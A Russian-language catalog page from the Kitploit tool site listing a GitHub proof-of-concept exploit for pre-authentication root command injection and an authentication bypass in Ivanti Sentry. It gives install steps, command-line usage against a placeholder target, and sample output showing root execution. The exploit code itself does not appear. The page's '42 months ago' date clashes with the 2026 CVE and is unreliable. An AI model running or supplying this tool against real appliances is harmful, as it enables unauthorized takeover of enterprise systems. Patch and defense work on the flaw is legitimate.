Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Репозиторий
42 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

Pre-Authentication Remote Code Execution + Authentication Bypass

Автор: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Обзор

Две критические уязвимости, затрагивающие Ivanti Sentry (ранее MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - Внедрение команд ОС без аутентификации (RCE от root)
  • CVE-2026-10523 → CVSS 9.9 - Обход аутентификации

Эти уязвимости позволяют неаутентифицированным злоумышленникам полностью скомпрометировать систему.


✨ Особенности

  • ✅ Чистый и быстрый PoC
  • ✅ Без аутентификации (учётные данные не требуются)
  • ✅ Выполнение команд от root
  • ✅ Детальное форматирование вывода
  • ✅ Поддержка прокси
  • ✅ Подробный режим (verbose)
  • ✅ Красивый интерфейс терминала

🚀 Использование

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

Примеры

root@kitploit:~
# Basic usage
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# Verbose mode
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# With proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# Check kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 Опции


🛠️ Установка

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 Успешная эксплуатация

Если уязвимость присутствует, вы увидите:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование против систем, которые вам не принадлежат, противозаконно.
Автор не несёт ответственности за неправомерное использование.


🔧 Затронутые версии

  • Ivanti Sentry до 10.5.2, 10.6.2, 10.7.1

Исправлено в: 10.5.2 / 10.6.2 / 10.7.1


📜 Ссылки

  • Официальное уведомление Ivanti
  • Оригинальное исследование watchTowr Labs
  • Записи NVD: CVE-2026-10520, CVE-2026-10523

Сделано с ❤️ Ashraf Zaryouh "0xBlackash"

Поставьте звезду репозиторию, если он был полезен! ⭐

Скачать инструмент
АргументОписаниеОбязательно
--urlЦелевой URL (например, https://target:8443)Да
--cmdКоманда для выполненияДа
-v, --verboseВключить подробный выводНет
--proxyHTTP прокси (хост:порт)Нет